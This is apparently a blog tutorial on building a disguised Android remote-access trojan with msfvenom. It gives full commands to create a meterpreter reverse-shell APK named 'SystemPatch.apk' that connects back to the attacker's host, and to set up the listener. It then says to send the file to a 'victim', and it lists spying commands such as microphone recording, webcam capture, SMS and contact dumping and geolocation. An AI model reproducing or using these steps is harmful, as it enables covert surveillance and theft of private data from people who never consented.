Hacking Android Phone using Payload created with Msfvenom

Hacking Android Phone using Payload created with Msfvenom

Leave a Comment / Android, Ethical Hacking, Linux / By

Hacking Android Phone using Payload created with Msfvenom

Msfvenom is a kali linux hacking tool for android ,is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance known as msfvenom payload.

H

acking With METASPLOIT in Kali Linux is a old tool. Metasploit is enhanced by msfvenom in kali linux. Metasploit is now a outdated tool.

So, let’s get started!!

STEPS :

  1. Fire Up kali and open command terminal.
  2. Set payload and create custom android APK file.Command:
                  root@Short-wiz:-# msfvenom -p android/meterpreter/reverse_tcp LHOST=74.18.0.45 LPORT=4443 R > SystemPatch.apk




    {
    To know your LHOST (LHOST is your machine IP address),                                                                                            open new terminal and type   ifconfig
    1. eth0 : is for Ethernet connects with data cables.
    2. wlan0 : for WIFI connections (Recommend if you are on the same wifi as your future victim)
    }

    Your APK file had being saved in the Home folder, as SystemPatch.apk

    Note: Don’t add any stray space characters anywhere. Use the command as is (after changing the LHOST and LPORT as needed).

  3. Start the metasploit framework console as follows :Command:root@Short-wiz:-# msfconsole
  4. Now it’s time to open and setup multi-handler. Follows the steps :
    • msf > use multi/handler
    • msf exploit(handler) > set payload android/meterpreter/reverse_tcp
    • msf exploit(handler) > set LHOST 74.18.0.45
    • msf exploit(handler) > set LPORT 4443
    • msf exploit(handler) > exploit

    Payload Handler is being started……..

  5. Transfer/mail this file (here SystemPatch.apk) file to the victim’s phone and install it.
  6. When the victims clicks on the app(installed as MAIN ACTIVITY in the menu) in his phone, meterpreter session will be established.
  7. Try the following exploit commands :


    • record_mic
    • webcam_snap
    • webcam_stream
    • dump_contacts
    • dump_sms
    • geolocate

    ************************************************************************

Error fixing(incase you get PARSE ERROR)

Two methods:

1)Type command “d2j-apk-sign SystemPatch.apk”

or

2) To fix this error download signapk – Click here to download




Steps to follow

  1. Open Signapk folder then open cmd.
  2. Copy the SystemPatch.apk(the app you made) in Signapk folder.
  3. Type java -” jar signapk.jar certificate.pem key.pk8 SytemPatch.apk SystemPatch-signed.apk “in cmd(not double quotes).
  4. copy it in your phone and install it.





Hope this works for you too… 🙂